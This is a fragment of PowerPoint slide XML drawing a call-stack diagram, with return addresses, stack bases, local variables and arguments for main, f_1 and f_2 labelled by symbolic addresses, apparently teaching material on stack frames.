                      <p:nvCxnSpPr>
                        <p:cNvPr id="470" name="Shape 640">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{478640F1-DFE8-4BA9-887A-6527915D5695}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvCxnSpPr>
                          <a:cxnSpLocks/>
                        </p:cNvCxnSpPr>
                        <p:nvPr/>
                      </p:nvCxnSpPr>
                      <p:spPr>
                        <a:xfrm>
                          <a:off x="6964304" y="1842836"/>
                          <a:ext cx="686232" cy="0"/>
                        </a:xfrm>
                        <a:prstGeom prst="straightConnector1">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="9525" cap="flat" cmpd="sng">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                          <a:round/>
                          <a:headEnd type="none" w="med" len="med"/>
                          <a:tailEnd type="triangle" w="med" len="med"/>
                        </a:ln>
                      </p:spPr>
                    </p:cxnSp>
                    <p:cxnSp>
                      <p:nvCxnSpPr>
                        <p:cNvPr id="471" name="Shape 640">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EBA7575-C526-4B04-9FAD-66929D465F2C}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvCxnSpPr>
                          <a:cxnSpLocks/>
                        </p:cNvCxnSpPr>
                        <p:nvPr/>
                      </p:nvCxnSpPr>
                      <p:spPr>
                        <a:xfrm>
                          <a:off x="6967318" y="2887677"/>
                          <a:ext cx="686232" cy="0"/>
                        </a:xfrm>
                        <a:prstGeom prst="straightConnector1">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="9525" cap="flat" cmpd="sng">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                          <a:round/>
                          <a:headEnd type="none" w="med" len="med"/>
                          <a:tailEnd type="triangle" w="med" len="med"/>
                        </a:ln>
                      </p:spPr>
                    </p:cxnSp>
                    <p:grpSp>
                      <p:nvGrpSpPr>
                        <p:cNvPr id="472" name="组合 471">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{258D0FB5-442F-4E7A-AD62-EE9D9BFDCEBB}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvGrpSpPr/>
                        <p:nvPr/>
                      </p:nvGrpSpPr>
                      <p:grpSpPr>
                        <a:xfrm>
                          <a:off x="7045166" y="228815"/>
                          <a:ext cx="2309862" cy="2948125"/>
                          <a:chOff x="7045166" y="228815"/>
                          <a:chExt cx="2309862" cy="2948125"/>
                        </a:xfrm>
                      </p:grpSpPr>
                      <p:sp>
                        <p:nvSpPr>
                          <p:cNvPr id="473" name="Shape 636">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08F9F292-5912-4459-9FD2-5F08F5D85944}"/>
                              </a:ext>
                            </a:extLst>
                          </p:cNvPr>
                          <p:cNvSpPr/>
                          <p:nvPr/>
                        </p:nvSpPr>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="7049540" y="2564902"/>
                            <a:ext cx="1291656" cy="455861"/>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000" dirty="0">
                                <a:latin typeface="Consolas"/>
                                <a:ea typeface="Consolas"/>
                                <a:cs typeface="Consolas"/>
                                <a:sym typeface="Consolas"/>
                              </a:rPr>
                              <a:t>addr7</a:t>
                            </a:r>
                            <a:endParaRPr sz="1000" dirty="0">
                              <a:latin typeface="Consolas"/>
                              <a:ea typeface="Consolas"/>
                              <a:cs typeface="Consolas"/>
                              <a:sym typeface="Consolas"/>
                            </a:endParaRPr>
                          </a:p>
                        </p:txBody>
                      </p:sp>
                      <p:grpSp>
                        <p:nvGrpSpPr>
                          <p:cNvPr id="474" name="组合 473">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8104BF0-503B-44B9-9837-CF381308AA10}"/>
                              </a:ext>
                            </a:extLst>
                          </p:cNvPr>
                          <p:cNvGrpSpPr/>
                          <p:nvPr/>
                        </p:nvGrpSpPr>
                        <p:grpSpPr>
                          <a:xfrm>
                            <a:off x="7045166" y="228815"/>
                            <a:ext cx="2309862" cy="2948125"/>
                            <a:chOff x="7045166" y="228815"/>
                            <a:chExt cx="2309862" cy="2948125"/>
                          </a:xfrm>
                        </p:grpSpPr>
                        <p:sp>
                          <p:nvSpPr>
                            <p:cNvPr id="475" name="Shape 636">
                              <a:extLst>
                                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65832268-2BD2-490C-B02E-CB990092851F}"/>
                                </a:ext>
                              </a:extLst>
                            </p:cNvPr>
                            <p:cNvSpPr/>
                            <p:nvPr/>
                          </p:nvSpPr>
                          <p:spPr>
                            <a:xfrm>
                              <a:off x="7045166" y="471150"/>
                              <a:ext cx="1290004" cy="41557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000" dirty="0">
                                  <a:latin typeface="Consolas"/>
                                  <a:ea typeface="Consolas"/>
                                  <a:cs typeface="Consolas"/>
                                  <a:sym typeface="Consolas"/>
                                </a:rPr>
                                <a:t>addr15</a:t>
                              </a:r>
                              <a:endParaRPr sz="1000" dirty="0">
                                <a:latin typeface="Consolas"/>
                                <a:ea typeface="Consolas"/>
                                <a:cs typeface="Consolas"/>
                                <a:sym typeface="Consolas"/>
                              </a:endParaRPr>
                            </a:p>
                          </p:txBody>
                        </p:sp>
                        <p:sp>
                          <p:nvSpPr>
                            <p:cNvPr id="476" name="Shape 636">
                              <a:extLst>
                                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78DB96A4-A5EB-46FC-B26E-BCDC615587D8}"/>
                                </a:ext>
                              </a:extLst>
                            </p:cNvPr>
                            <p:cNvSpPr/>
                            <p:nvPr/>
                          </p:nvSpPr>
                          <p:spPr>
                            <a:xfrm>
                              <a:off x="7054111" y="1586771"/>
                              <a:ext cx="1280003" cy="356277"/>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000" dirty="0">
                                  <a:latin typeface="Consolas"/>
                                  <a:ea typeface="Consolas"/>
                                  <a:cs typeface="Consolas"/>
                                  <a:sym typeface="Consolas"/>
                                </a:rPr>
                                <a:t>addr11</a:t>
                              </a:r>
                              <a:endParaRPr sz="1000" dirty="0">
                                <a:latin typeface="Consolas"/>
                                <a:ea typeface="Consolas"/>
                                <a:cs typeface="Consolas"/>
                                <a:sym typeface="Consolas"/>
                              </a:endParaRPr>
                            </a:p>
                          </p:txBody>
                        </p:sp>
                        <p:grpSp>
                          <p:nvGrpSpPr>
                            <p:cNvPr id="477" name="组合 476">
                              <a:extLst>
                                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1289754F-C547-49AA-843C-9D20372DB785}"/>
                                </a:ext>
                              </a:extLst>
                            </p:cNvPr>
                            <p:cNvGrpSpPr/>
                            <p:nvPr/>
                          </p:nvGrpSpPr>
                          <p:grpSpPr>
                            <a:xfrm>
                              <a:off x="7650536" y="228815"/>
                              <a:ext cx="1704492" cy="2948125"/>
                              <a:chOff x="7650536" y="228815"/>
                              <a:chExt cx="1704492" cy="2948125"/>
                            </a:xfrm>
                          </p:grpSpPr>
                          <p:sp>
                            <p:nvSpPr>
                              <p:cNvPr id="478" name="Shape 650">
                                <a:extLst>
                                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83B3C63E-1CE3-4B64-9FF5-6958F54AB392}"/>
                                  </a:ext>
                                </a:extLst>
                              </p:cNvPr>
                              <p:cNvSpPr/>
                              <p:nvPr/>
                            </p:nvSpPr>
                            <p:spPr>
                              <a:xfrm>
                                <a:off x="7650536" y="2887675"/>
                                <a:ext cx="1704489" cy="289265"/>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b="1" dirty="0">
                                    <a:solidFill>
                                      <a:schemeClr val="accent5"/>
                                    </a:solidFill>
                                  </a:rPr>
                                  <a:t>f_2</a:t>
                                </a:r>
                                <a:r>
                                  <a:rPr lang="en-US" sz="1000" b="1" dirty="0"/>
                                  <a:t>’s local variables</a:t>
                                </a:r>
                                <a:endParaRPr sz="1000" b="1" dirty="0">
                                  <a:solidFill>
                                    <a:schemeClr val="accent5"/>
                                  </a:solidFill>
                                </a:endParaRPr>
                              </a:p>
                            </p:txBody>
                          </p:sp>
                          <p:grpSp>
                            <p:nvGrpSpPr>
                              <p:cNvPr id="479" name="组合 478">
                                <a:extLst>
                                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1049B4F-E75A-42DD-B25A-92399C42B6F7}"/>
                                  </a:ext>
                                </a:extLst>
                              </p:cNvPr>
                              <p:cNvGrpSpPr/>
                              <p:nvPr/>
                            </p:nvGrpSpPr>
                            <p:grpSpPr>
                              <a:xfrm>
                                <a:off x="7650537" y="228815"/>
                                <a:ext cx="1704491" cy="2674151"/>
                                <a:chOff x="7650537" y="228815"/>
                                <a:chExt cx="1704491" cy="2674151"/>
                              </a:xfrm>
                            </p:grpSpPr>
                            <p:sp>
                              <p:nvSpPr>
                                <p:cNvPr id="480" name="Shape 621">
                                  <a:extLst>
                                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D19A1F2-2364-4430-BE96-2DC32BE7A816}"/>
                                    </a:ext>
                                  </a:extLst>
                                </p:cNvPr>
                                <p:cNvSpPr/>
                                <p:nvPr/>
                              </p:nvSpPr>
                              <p:spPr>
                                <a:xfrm>
                                  <a:off x="7650538" y="228815"/>
                                  <a:ext cx="1704489" cy="270722"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:solidFill>
                                  <a:schemeClr val="accent5">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en-US" altLang="zh-CN" sz="1000" b="1" dirty="0"/>
                                    <a:t>Return address</a:t>
                                  </a:r>
                                  <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                                    <a:solidFill>
                                      <a:schemeClr val="accent5"/>
                                    </a:solidFill>
                                  </a:endParaRPr>
                                </a:p>
                              </p:txBody>
                            </p:sp>
                            <p:sp>
                              <p:nvSpPr>
                                <p:cNvPr id="481" name="Shape 647">
                                  <a:extLst>
                                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0683F76-43D6-43C9-8D7F-5AE45C715B76}"/>
                                    </a:ext>
                                  </a:extLst>
                                </p:cNvPr>
                                <p:cNvSpPr/>
                                <p:nvPr/>
                              </p:nvSpPr>
                              <p:spPr>
                                <a:xfrm>
                                  <a:off x="7650538" y="499537"/>
                                  <a:ext cx="1704489" cy="270722"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:solidFill>
                                  <a:schemeClr val="accent6">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000" b="1" dirty="0">
                                      <a:solidFill>
                                        <a:schemeClr val="accent5"/>
                                      </a:solidFill>
                                    </a:rPr>
                                    <a:t>main</a:t>
                                  </a:r>
                                  <a:r>
                                    <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0"/>
                                    <a:t>’s stackbase</a:t>
                                  </a:r>
                                  <a:endParaRPr sz="1000" b="1" dirty="0"/>
                                </a:p>
                              </p:txBody>
                            </p:sp>
                            <p:sp>
                              <p:nvSpPr>
                                <p:cNvPr id="482" name="Shape 648">
                                  <a:extLst>
                                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1034017C-8775-461C-BBD2-F2241927B2EF}"/>
                                    </a:ext>
                                  </a:extLst>
                                </p:cNvPr>
                                <p:cNvSpPr/>
                                <p:nvPr/>
                              </p:nvSpPr>
                              <p:spPr>
                                <a:xfrm>
                                  <a:off x="7650539" y="1037363"/>
                                  <a:ext cx="1704489" cy="270721"/>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b="1" dirty="0"/>
                                    <a:t>arg1_m~arg1_1</a:t>
                                  </a:r>
                                  <a:endParaRPr lang="en" sz="1000" b="1" dirty="0"/>
                                </a:p>
                              </p:txBody>
                            </p:sp>
                            <p:sp>
                              <p:nvSpPr>
                                <p:cNvPr id="483" name="Shape 620">
                                  <a:extLst>
                                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49A97C56-5BC6-406D-9777-5F27171A77E3}"/>
                                    </a:ext>
                                  </a:extLst>
                                </p:cNvPr>
                                <p:cNvSpPr/>
                                <p:nvPr/>
                              </p:nvSpPr>
                              <p:spPr>
                                <a:xfrm>
                                  <a:off x="7650537" y="1304738"/>
                                  <a:ext cx="1704490" cy="270721"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:solidFill>
                                  <a:schemeClr val="accent5">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altLang="zh-CN" sz="1000" b="1" dirty="0"/>
                                    <a:t>Return address = </a:t>
                                  </a:r>
                                  <a:r>
                                    <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                                      <a:solidFill>
                                        <a:srgbClr val="FF0000"/>
                                      </a:solidFill>
                                    </a:rPr>
                                    <a:t>addr1</a:t>
                                  </a:r>
                                </a:p>
                              </p:txBody>
                            </p:sp>
                            <p:sp>
                              <p:nvSpPr>
                                <p:cNvPr id="484" name="Shape 649">
                                  <a:extLst>
                                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21A72ACB-1770-4BE0-ABE8-763B9C107A94}"/>
                                    </a:ext>
                                  </a:extLst>
                                </p:cNvPr>
                                <p:cNvSpPr/>
                                <p:nvPr/>
                              </p:nvSpPr>
                              <p:spPr>
                                <a:xfrm>
                                  <a:off x="7650539" y="1575460"/>
                                  <a:ext cx="1704489" cy="267376"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:solidFill>
                                  <a:schemeClr val="accent6">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000" b="1" dirty="0">
                                      <a:solidFill>
                                        <a:schemeClr val="accent5"/>
                                      </a:solidFill>
                                    </a:rPr>
                                    <a:t>f_1</a:t>
                                  </a:r>
                                  <a:r>
                                    <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0"/>
                                    <a:t>’s stackbase = </a:t>
                                  </a:r>
                                  <a:r>
                                    <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                                      <a:solidFill>
                                        <a:srgbClr val="FF0000"/>
                                      </a:solidFill>
                                    </a:rPr>
                                    <a:t>addr15 </a:t>
                                  </a:r>
                                  <a:endParaRPr sz="1000" b="1" dirty="0">
                                    <a:solidFill>
                                      <a:srgbClr val="FF0000"/>
                                    </a:solidFill>
                                  </a:endParaRPr>
                                </a:p>
                              </p:txBody>
                            </p:sp>
                            <p:sp>
                              <p:nvSpPr>
                                <p:cNvPr id="485" name="Shape 650">
                                  <a:extLst>
                                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC34A805-5EBC-45E6-BCAD-512260E0F777}"/>
                                    </a:ext>
                                  </a:extLst>
                                </p:cNvPr>
                                <p:cNvSpPr/>
                                <p:nvPr/>
                              </p:nvSpPr>
                              <p:spPr>
                                <a:xfrm>
                                  <a:off x="7650539" y="1842837"/>
                                  <a:ext cx="1704489" cy="267376"/>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b="1" dirty="0">
                                      <a:solidFill>
                                        <a:schemeClr val="accent5"/>
                                      </a:solidFill>
                                    </a:rPr>
                                    <a:t>f_1</a:t>
                                  </a:r>
                                  <a:r>
                                    <a:rPr lang="en-US" sz="1000" b="1" dirty="0"/>
                                    <a:t>’s local variables</a:t>
                                  </a:r>
                                  <a:endParaRPr sz="1000" b="1" dirty="0">
                                    <a:solidFill>
                                      <a:schemeClr val="accent5"/>
                                    </a:solidFill>
                                  </a:endParaRPr>
                                </a:p>
                              </p:txBody>
                            </p:sp>
                            <p:sp>
                              <p:nvSpPr>
                                <p:cNvPr id="486" name="Shape 651">
                                  <a:extLst>
                                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5225BAF-9058-420C-8437-C9D8336731A4}"/>
                                    </a:ext>
                                  </a:extLst>
                                </p:cNvPr>
                                <p:cNvSpPr/>
                                <p:nvPr/>
                              </p:nvSpPr>
                              <p:spPr>
                                <a:xfrm>
                                  <a:off x="7650539" y="2110214"/>
                                  <a:ext cx="1704489" cy="262422"/>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000" b="1" dirty="0"/>
                                    <a:t>arg_k~arg_i</a:t>
                                  </a:r>
                                </a:p>
                              </p:txBody>
                            </p:sp>
                            <p:sp>
                              <p:nvSpPr>
                                <p:cNvPr id="487" name="Shape 651">
                                  <a:extLst>
                                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{181EF953-6C2E-42EF-9816-18B1E30BAC00}"/>
                                    </a:ext>
                                  </a:extLst>
                                </p:cNvPr>
                                <p:cNvSpPr/>
                                <p:nvPr/>
                              </p:nvSpPr>
                              <p:spPr>
                                <a:xfrm>
                                  <a:off x="7650537" y="2370096"/>
                                  <a:ext cx="1704489" cy="262422"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:solidFill>
                                  <a:schemeClr val="accent5">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b="1" dirty="0"/>
                                    <a:t>Return address = </a:t>
                                  </a:r>
                                  <a:r>
                                    <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                                      <a:solidFill>
                                        <a:srgbClr val="FF0000"/>
                                      </a:solidFill>
                                    </a:rPr>
                                    <a:t>addr2</a:t>
                                  </a:r>
                                  <a:endParaRPr sz="1000" b="1" dirty="0">
                                    <a:solidFill>
                                      <a:srgbClr val="FF0000"/>
                                    </a:solidFill>
                                  </a:endParaRPr>
                                </a:p>
                              </p:txBody>
                            </p:sp>
                            <p:sp>
                              <p:nvSpPr>
                                <p:cNvPr id="488" name="Shape 649">
                                  <a:extLst>
                                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2337A39-D83F-4889-9BF3-CA6DF244CA89}"/>
                                    </a:ext>
                                  </a:extLst>
                                </p:cNvPr>
                                <p:cNvSpPr/>
                                <p:nvPr/>
                              </p:nvSpPr>
                              <p:spPr>
                                <a:xfrm>
                                  <a:off x="7650537" y="2635590"/>
                                  <a:ext cx="1704489" cy="267376"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:solidFill>
                                  <a:schemeClr val="accent6">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000" b="1" dirty="0">
                                      <a:solidFill>
                                        <a:schemeClr val="accent5"/>
                                      </a:solidFill>
                                    </a:rPr>
                                    <a:t>f_2</a:t>
                                  </a:r>
                                  <a:r>
                                    <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0"/>
                                    <a:t>’s stackbase = </a:t>
                                  </a:r>
                                  <a:r>
                                    <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                                      <a:solidFill>
                                        <a:srgbClr val="FF0000"/>
                                      </a:solidFill>
                                    </a:rPr>
                                    <a:t>addr11</a:t>
                                  </a:r>
                                  <a:endParaRPr sz="1000" b="1" dirty="0">
                                    <a:solidFill>
                                      <a:srgbClr val="FF0000"/>
                                    </a:solidFill>
                                  </a:endParaRPr>
                                </a:p>
                              </p:txBody>
                            </p:sp>
                            <p:sp>
                              <p:nvSpPr>
                                <p:cNvPr id="489" name="Shape 650">
                                  <a:extLst>
                                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEDC59BC-2E5E-4F5D-B8FC-B5700F0B279E}"/>
                                    </a:ext>
                                  </a:extLst>
                                </p:cNvPr>
                                <p:cNvSpPr/>
                                <p:nvPr/>
                              </p:nvSpPr>
                              <p:spPr>
                                <a:xfrm>
                                  <a:off x="7650538" y="769985"/>
                                  <a:ext cx="1704489" cy="272859"/>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000" b="1" dirty="0">
                                      <a:solidFill>
                                        <a:schemeClr val="accent5"/>
                                      </a:solidFill>
                                    </a:rPr>
                                    <a:t>main</a:t>
                                  </a:r>
                                  <a:r>
                                    <a:rPr lang="en-US" sz="1000" b="1" dirty="0"/>
                                    <a:t>’s local variables</a:t>
                                  </a:r>
                                  <a:endParaRPr sz="1000" b="1" dirty="0">
                                    <a:solidFill>
                                      <a:schemeClr val="accent5"/>
                                    </a:solidFill>
                                  </a:endParaRPr>
                                </a:p>
                              </p:txBody>
                            </p:sp>
                          </p:grpSp>
                        </p:grpSp>
                      </p:grpSp>
                    </p:grpSp>
                  </p:grpSp>
                  <p:cxnSp>
                    <p:nvCxnSpPr>
                      <p:cNvPr id="467" name="Shape 640">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79376DDF-0564-401E-8B81-4F5BA7D2ACFD}"/>
                          </a:ext>
                        </a:extLst>
                      </p:cNvPr>
                      <p:cNvCxnSpPr>
                        <a:cxnSpLocks/>
                        <a:stCxn id="464" idx="1"/>
                      </p:cNvCxnSpPr>
                      <p:nvPr/>
                    </p:nvCxnSpPr>
                    <p:spPr>
                      <a:xfrm flipH="1">
                        <a:off x="9355025" y="1446090"/>
                        <a:ext cx="877108" cy="1456875"/>
                      </a:xfrm>
                      <a:prstGeom prst="straightConnector1">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="9525" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:schemeClr val="dk2"/>
                        </a:solidFill>
                        <a:prstDash val="solid"/>
                        <a:round/>
                        <a:headEnd type="none" w="med" len="med"/>
                        <a:tailEnd type="triangle" w="med" len="med"/>
                      </a:ln>
                    </p:spPr>
                  </p:cxnSp>
                  <p:cxnSp>
                    <p:nvCxnSpPr>
                      <p:cNvPr id="468" name="Shape 640">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{458B3A17-C848-4712-98D4-1BACF0540F58}"/>
                          </a:ext>
                        </a:extLst>
                      </p:cNvPr>
                      <p:cNvCxnSpPr>
                        <a:cxnSpLocks/>
                        <a:stCxn id="465" idx="1"/>
                      </p:cNvCxnSpPr>
                      <p:nvPr/>
                    </p:nvCxnSpPr>
                    <p:spPr>
                      <a:xfrm flipH="1">
                        <a:off x="9362108" y="1744633"/>
                        <a:ext cx="866306" cy="1432190"/>
                      </a:xfrm>
                      <a:prstGeom prst="straightConnector1">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="9525" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:schemeClr val="dk2"/>
                        </a:solidFill>
                        <a:prstDash val="solid"/>
                        <a:round/>
                        <a:headEnd type="none" w="med" len="med"/>
                        <a:tailEnd type="triangle" w="med" len="med"/>
                      </a:ln>
                    </p:spPr>
                  </p:cxnSp>
                </p:grpSp>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="461" name="Shape 636">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{539AF9D6-48F2-49E8-ADE7-D0867FB77AC3}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvSpPr/>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr>
                    <a:xfrm>
                      <a:off x="7050019" y="2845611"/>
                      <a:ext cx="1293954" cy="451712"/>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000" dirty="0">
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:rPr>
                        <a:t>addr6</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" dirty="0">
                        <a:latin typeface="Consolas"/>
                        <a:ea typeface="Consolas"/>
                        <a:cs typeface="Consolas"/>
                        <a:sym typeface="Consolas"/>
                      </a:endParaRPr>
                    </a:p>
                  </p:txBody>
                </p:sp>
              </p:grpSp>
            </p:grpSp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="450" name="组合 449">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1B11371-1358-4661-A87B-E3ED8574D7A9}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="6964304" y="1721589"/>
                  <a:ext cx="1374534" cy="348390"/>
                  <a:chOff x="6964304" y="1721589"/>
                  <a:chExt cx="1374534" cy="348390"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:cxnSp>
                <p:nvCxnSpPr>
                  <p:cNvPr id="452" name="Shape 640">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DFDE02A-47C0-4F23-8F7B-4D06010D0934}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvCxnSpPr>
                    <a:cxnSpLocks/>
                  </p:cNvCxnSpPr>
                  <p:nvPr/>
                </p:nvCxnSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="6964304" y="1962280"/>
                    <a:ext cx="690098" cy="0"/>
                  </a:xfrm>
                  <a:prstGeom prst="straightConnector1">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="9525" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:schemeClr val="dk2"/>
                    </a:solidFill>
                    <a:prstDash val="solid"/>
                    <a:round/>
                    <a:headEnd type="none" w="med" len="med"/>
                    <a:tailEnd type="triangle" w="med" len="med"/>
                  </a:ln>
                </p:spPr>
              </p:cxnSp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="453" name="Shape 636">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7FA0469-147A-41C6-927C-E53B10A5EA53}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="7055420" y="1721589"/>
                    <a:ext cx="1283418" cy="34839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000" dirty="0">
                        <a:latin typeface="Consolas"/>
                        <a:ea typeface="Consolas"/>
                        <a:cs typeface="Consolas"/>
                        <a:sym typeface="Consolas"/>
                      </a:rPr>
                      <a:t>addr9</a:t>
                    </a:r>
                    <a:endParaRPr sz="1000" dirty="0">
                      <a:latin typeface="Consolas"/>
                      <a:ea typeface="Consolas"/>
                      <a:cs typeface="Consolas"/>
                      <a:sym typeface="Consolas"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="451" name="Shape 636">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20CACB8B-0299-4662-BE5B-0A3363735436}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7054617" y="820145"/>
                  <a:ext cx="1287214" cy="38944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000" dirty="0">
                      <a:latin typeface="Consolas"/>
                      <a:ea typeface="Consolas"/>
                      <a:cs typeface="Consolas"/>
